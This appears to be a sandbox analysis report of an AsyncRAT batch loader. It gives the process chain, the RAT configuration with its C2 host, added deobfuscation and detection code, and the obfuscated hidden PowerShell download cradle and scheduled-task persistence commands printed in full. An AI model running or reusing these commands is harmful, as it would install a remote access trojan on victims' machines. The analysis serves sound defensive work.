File name: Inovice.bat
Full analysis: https://app.any.run/tasks/3bd6edf1-e76e-40d5-bfaa-0ef4a844e6e8
Verdict: Malicious activity
Threats:

AsyncRAT is a remote access trojan (RAT) that can monitor and remotely control infected systems. It was published on GitHub as an open-source remote administration tool, but attackers widely abuse its feature set, and the builds seen in the wild are almost always malicious.

Analysis date: December 05, 2022, 19:47:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
asyncrat
trojan
rat
Indicators:
MIME: text/plain
File info: UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5: BF021F142FA831D9BE71B25476DAF0F6
SHA1: F2F5735ACD04E2228AC09586CAD425B82409F253
SHA256: 8DBAC79CA4B263BE822F6DDAE805B854753E1118767353654CC26DAB34F44C49
SSDEEP: 192:lzJ1cqL+cWrc2DaODe779zgWg94YWNjaOfQ:pJ1cqL+cWrc2DFe77pgWg94YWNje

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2624)
      • schtasks.exe (PID: 3428)
      • schtasks.exe (PID: 2188)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • ASYNCRAT detected by memory dumps

      • powershell.exe (PID: 1260)
      • aspnet_compiler.exe (PID: 2116)
    • ASYNCRAT was detected

      • aspnet_compiler.exe (PID: 2116)
  • SUSPICIOUS

    • Executes scripts

      • powershell.exe (PID: 1112)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3992)
      • cmd.exe (PID: 3712)
      • WScript.exe (PID: 2692)
    • Application launched itself

      • cmd.exe (PID: 3248)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3248)
    • Executes via Task Scheduler

      • WScript.exe (PID: 2692)
    • Reads the Internet Settings

      • aspnet_compiler.exe (PID: 2116)
    • Reads settings of System Certificates

      • aspnet_compiler.exe (PID: 2116)
  • INFO

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • Creates a file in a temporary directory

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • Checks supported languages

      • aspnet_compiler.exe (PID: 2116)
    • Reads Environment values

      • aspnet_compiler.exe (PID: 2116)
    • Reads the computer name

      • aspnet_compiler.exe (PID: 2116)

AsyncRat configuration (extracted from PID 2116, aspnet_compiler.exe)

Install_Folder: %AppData%
Salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Aes_Key: 561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c
Botnet: BTC Address
bdos: false
PasteBin: true
AntiVM: false
Server_Signature: GN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS...
Certificate: MIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B...
Mutex: AsyncMutex_fghd
Autorun: false
Version: | Edit 3LOSH RAT
Ports (1): 6666
C2 (1): aboreda.linkpc.net

Notes on the configuration: the Salt is the default salt shipped with the open-source AsyncRAT client, so this build did not change the key-derivation parameters; the embedded server certificate decodes to subject CN=AsyncRAT Server, which is exactly what the two ET TROJAN "AsyncRAT ... SSL Cert" signatures below match on; and Autorun is false because persistence is handled by the loader's scheduled tasks (PIDs 3428 and 2624), not by the RAT's own install routine. The C2 host and port match the only outbound connection made by aspnet_compiler.exe (198.20.177.229:6666).
Total processes: 46
Monitored processes: 11
Malicious processes: 3
Suspicious processes: 2

Behavior graph

Nodes in the order the interactive graph lists them (nodes the graph marks "no specs" carry no specific indicator of their own): start, cmd.exe, cmd.exe, powershell.exe, wscript.exe, powershell.exe, schtasks.exe, schtasks.exe, wscript.exe, powershell.exe [#ASYNCRAT], aspnet_compiler.exe [#ASYNCRAT], schtasks.exe

Process information

Each monitored process is listed with its PID, command line (CMD), image path, parent process and properties, followed by the loaded modules.

PID: 3248
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Inovice.bat" "
Path: C:\Windows\system32\cmd.exe
Parent process: Explorer.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 3712
CMD: CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1112
CMD: POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
Decoded command (the three string literals concatenated, with the Replace() placeholder resolved to ADSTRING; the [BYTE[]]; tokens are filler): IEX(NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('http://198.20.177.229:444/x.png')
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
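The stager run by PID 1112 hides a plain DownloadString cradle behind three string fragments, a Replace() call that swaps a long placeholder for the missing "ADSTRING", and [BYTE[]]; filler. The following is an added example, written for this page and not code from the report or from ANY.RUN: a Python static evaluator for exactly this literal-assignment, concatenation and Replace() pattern that recovers the command and its URL without executing any PowerShell. The embedded sample command line reproduces the observed structure; the three roughly 200-character hex variable names are shortened to A1, B2 and C3 and the placeholder to Q7Q7 (constructed abbreviations, since the regexes do not care about name length).

```python
import re

# Single-quoted PowerShell string literal; a doubled quote ('') is an escaped quote.
_STR = r"'((?:[^']|'')*)'"
# $name = '<literal>' followed by zero or more .Replace('<old>','<new>') calls.
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + _STR
                     + r"((?:\.REPLACE\(" + _STR + "," + _STR + r"\))*)", re.I)
_REPLACE = re.compile(r"\.REPLACE\(" + _STR + "," + _STR + r"\)", re.I)
# IEX($a+$b+...): the invocation whose argument is a sum of variables.
_IEX = re.compile(r"IEX\(\s*((?:\$\w+\s*\+\s*)*\$\w+)\s*\)", re.I)
_URL = re.compile(r"https?://[^\s'\")]+", re.I)

# Stager command line of PIDs 3712/1112 from this report, with the long hex variable
# names and the Replace() placeholder shortened (constructed abbreviation); the
# fragment boundaries, filler tokens and Replace() trick are as observed.
STAGER = (
    "POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI "
    "[BYTE[]];$A1='IEX(NEW-OBJECT NET.W';"
    "$B2='EBCLIENT).DOWNLO';"
    "[BYTE[]];$C3='Q7Q7(''http://198.20.177.229:444/x.png'')'.REPLACE('Q7Q7','ADSTRING');"
    "[BYTE[]];IEX($A1+$B2+$C3)"
)


def _unescape(literal: str) -> str:
    """Undo PowerShell's '' escape inside a single-quoted literal."""
    return literal.replace("''", "'")


def deobfuscate(cmdline: str) -> str:
    """Statically evaluate literal assignments, their .Replace() chains and the final
    IEX(<var>+<var>+...) concatenation. Nothing is executed; unknown constructs
    simply do not match and the function raises instead of guessing."""
    cmdline = re.sub(r"\[BYTE\[\]\];", "", cmdline, flags=re.I)  # dead filler tokens
    env = {}
    for m in _ASSIGN.finditer(cmdline):
        value = _unescape(m.group(2))
        for r in _REPLACE.finditer(m.group(3)):       # apply Replace() calls in order
            value = value.replace(_unescape(r.group(1)), _unescape(r.group(2)))
        env[m.group(1).upper()] = value               # PS variable names are case-insensitive
    m = _IEX.search(cmdline)
    if not m:
        raise ValueError("no IEX(<variables>) invocation found")
    parts = re.findall(r"\$(\w+)", m.group(1))
    return "".join(env[p.upper()] for p in parts)    # KeyError => an unresolved variable


def triage(cmdline: str) -> dict:
    """Decoded command, the URLs it references, and whether it is a WebClient cradle."""
    decoded = deobfuscate(cmdline)
    return {
        "decoded": decoded,
        "urls": _URL.findall(decoded),
        "download_cradle": bool(re.search(r"WEBCLIENT\)\.DOWNLOADSTRING\(", decoded, re.I)),
    }


if __name__ == "__main__":
    print(triage(STAGER))
```

The evaluator deliberately supports only the three operations this stager uses; anything else (format operators, char arrays, Base64) fails loudly rather than producing a half-decoded string, which is the behaviour you want in a triage pipeline.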
PID: 3992
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Logs\install.vbs"
Path: C:\Windows\System32\WScript.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 3112
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\install.ps1'))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3428
CMD: "C:\Windows\system32\schtasks.exe" /create /tn det /sc minute /st 00:10 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs
Path: C:\Windows\system32\schtasks.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2624
CMD: "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 3 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs
Path: C:\Windows\system32\schtasks.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 2692
CMD: C:\Windows\System32\WScript.exe "C:\Users\admin\AppData\Roaming\Logs\Loader.vbs"
Path: C:\Windows\System32\WScript.exe
Parent process: taskeng.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1260
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\Report.ps1'))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2116
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: aspnet_compiler.exe
Exit code: not recorded
Version: 4.0.30319.34209 built by: FX452RTMGDR
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
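Read top to bottom, the process records above form one chain: a batch file spawns a hidden, bypass-policy PowerShell download cradle; that drops install.vbs and .ps1 loaders under %AppData%\Roaming\Logs; the loaders register minute-interval scheduled tasks; the task engine re-launches WScript, which runs PowerShell again, which finally starts a signed, argument-less .NET binary (aspnet_compiler.exe) that then behaves as AsyncRAT. The following is an added example for this page, not code from the report or ANY.RUN: process-creation detection rules in Python, each keyed to one link of that chain, run over events reconstructed from the Process information section (constructed from the records above; the long stager command line is cut down to its flags and IEX tail, and parent images are the names the report gives, since it lists no parent PIDs). The list of .NET hollowing hosts and the scheduler parent names are my assumptions, not data from the report.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str      # executable basename, lower-case
    cmdline: str
    parent: str     # parent executable basename, lower-case


# Process-creation events reconstructed from this report's process records (constructed;
# the stager command line is abbreviated to its distinctive flags and IEX(...) tail).
EVENTS = [
    ProcEvent(3248, "cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Inovice.bat" "', "explorer.exe"),
    ProcEvent(3712, "cmd.exe", "CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$A='IEX(NEW-OBJECT NET.W';IEX($A+$B+$C)", "cmd.exe"),
    ProcEvent(1112, "powershell.exe", "POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$A='IEX(NEW-OBJECT NET.W';IEX($A+$B+$C)", "cmd.exe"),
    ProcEvent(3992, "wscript.exe", r'"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Logs\install.vbs"', "powershell.exe"),
    ProcEvent(3112, "powershell.exe", r"powershell.exe -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\install.ps1'))", "wscript.exe"),
    ProcEvent(3428, "schtasks.exe", r'"C:\Windows\system32\schtasks.exe" /create /tn det /sc minute /st 00:10 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs', "powershell.exe"),
    ProcEvent(2624, "schtasks.exe", r'"C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 3 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs', "powershell.exe"),
    ProcEvent(2692, "wscript.exe", r'C:\Windows\System32\WScript.exe "C:\Users\admin\AppData\Roaming\Logs\Loader.vbs"', "taskeng.exe"),
    ProcEvent(1260, "powershell.exe", r"powershell.exe -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\Report.ps1'))", "wscript.exe"),
    ProcEvent(2116, "aspnet_compiler.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"', "powershell.exe"),
]

USER_WRITABLE = re.compile(r"\\(appdata|programdata|temp|public)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd|hta)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_PARENTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}
# Assumption: signed .NET binaries commonly used as hollowing/injection hosts by loaders.
DOTNET_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}
# Assumption: taskeng.exe hosts task actions on Windows 7; the Schedule service runs in svchost.exe on Windows 10+.
SCHEDULER_PARENTS = {"taskeng.exe", "svchost.exe"}


def ps_hidden_iex(e: ProcEvent) -> bool:
    """Hidden-window / bypass / no-profile PowerShell that invokes IEX (the download cradle)."""
    c = e.cmdline.lower()
    flags = sum(bool(re.search(p, c)) for p in
                (r"-w\w*\s+hidden", r"-e\w*\s+bypass", r"-nop\b", r"-noni\w*"))
    return e.image == "powershell.exe" and flags >= 2 and "iex(" in c


def ps_iex_script_from_user_dir(e: ProcEvent) -> bool:
    """PowerShell evaluating a script read from a user-writable directory (the loaders)."""
    c = e.cmdline.lower()
    return (e.image == "powershell.exe" and "iex(" in c and "readalltext(" in c
            and USER_WRITABLE.search(c) is not None)


def schtasks_script_in_user_dir(e: ProcEvent) -> bool:
    """schtasks /create whose action is a script under a user-writable path (persistence)."""
    c = e.cmdline.lower()
    return (e.image == "schtasks.exe" and "/create" in c and "/tr" in c
            and USER_WRITABLE.search(c) is not None and SCRIPT_EXT.search(c) is not None)


def script_host_from_user_dir(e: ProcEvent) -> bool:
    """wscript/cscript running a script from a user-writable path."""
    return e.image in SCRIPT_HOSTS and USER_WRITABLE.search(e.cmdline) is not None


def script_host_from_scheduler(e: ProcEvent) -> bool:
    """Script host launched by the task scheduler (the persistence firing)."""
    return e.image in SCRIPT_HOSTS and e.parent in SCHEDULER_PARENTS


def dotnet_host_without_args(e: ProcEvent) -> bool:
    """A .NET hollowing host started with no arguments by a script interpreter."""
    bare = e.cmdline.strip().strip('"').lower()
    return e.image in DOTNET_HOSTS and e.parent in SCRIPT_PARENTS and bare.endswith(e.image)


RULES = {fn.__name__: fn for fn in (ps_hidden_iex, ps_iex_script_from_user_dir,
                                    schtasks_script_in_user_dir, script_host_from_user_dir,
                                    script_host_from_scheduler, dotnet_host_without_args)}


def evaluate(events) -> list:
    """(pid, image, rule) for every rule each event trips."""
    return [(e.pid, e.image, name) for e in events for name, rule in RULES.items() if rule(e)]


def flagged_pids(events) -> list:
    return sorted({pid for pid, _, _ in evaluate(events)})


if __name__ == "__main__":
    for hit in evaluate(EVENTS):
        print(*hit)
```

Note what does not fire: the two cmd.exe wrappers (PIDs 3248 and 3712) trip nothing, because the rules key on the interpreter that actually does the work; a real deployment would add the "cmd.exe launching a .bat from %Temp%" stage as a low-severity signal and correlate the chain by parent PID, which the report does not provide.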
Total events: 7 601 (read 7 551, write 50, delete 0)

Modification events

All listed registry writes come from PID 1112 (powershell.exe); 10 of the 50 write events appear in this excerpt. They are the RAS tracing keys that RASAPI32/RASMAN initialisation writes inside any process that loads them (here triggered by the WebClient network call), not attacker persistence.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
  write EnableFileTracing = 0
  write EnableConsoleTracing = 0
  write FileTracingMask = (value not shown)
  write ConsoleTracingMask = (value not shown)
  write MaxFileSize = 1048576
  write FileDirectory = %windir%\tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
  write EnableFileTracing = 0
  write EnableConsoleTracing = 0
  write FileTracingMask = (value not shown)
  write ConsoleTracingMask = (value not shown)
Executable files: 0
Suspicious files: 9
Text files: 4
Unknown types: 2

Dropped files (PID, process, filename, type, hashes)

1260 powershell.exe  C:\Users\admin\AppData\Local\Temp\51v2aea5.1nk.ps1  binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1112 powershell.exe  C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  dbf
  MD5: 446DD1CF97EABA21CF14D03AEBC79F27
  SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
1112 powershell.exe  C:\Users\admin\AppData\Roaming\Logs\Loader.vbs  text
  MD5: 7A1F08FD27F797B5A5CC2D79F8F6BBA7
  SHA256: 922DC773ABDFD0812B0E1ADCAABF9DEA2E5F0264573266CF0B024FEB984C632E
3112 powershell.exe  C:\Users\admin\AppData\Local\Temp\qntzpoo4.qqv.psm1  binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1112 powershell.exe  C:\Users\admin\AppData\Local\Temp\5ls2h5gk.p1g.ps1  binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1112 powershell.exe  C:\Users\admin\AppData\Roaming\Logs\install.ps1  text
  MD5: 6BDB23DD1842EFAA701CED26BB8AE3A5
  SHA256: 4E0C891BA520FC17F612E1D65B0549AEA0533070237B7BC27EE36613E212429C
1112 powershell.exe  C:\Users\admin\AppData\Local\Temp\me0xnowd.zwp.psm1  binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2116 aspnet_compiler.exe  C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506  binary
  MD5: 3EC598FDA7DA5A6080350EADC34CA03F
  SHA256: 9739D6314CAEA5B5779C6D80E00F205CD57594DC702DAA458528BF92D1E1C1DB
1112 powershell.exe  C:\Users\admin\AppData\Roaming\Logs\Report.ps1  text
  MD5: AFEB32EFA5CDAAEE1360F00886C19B10
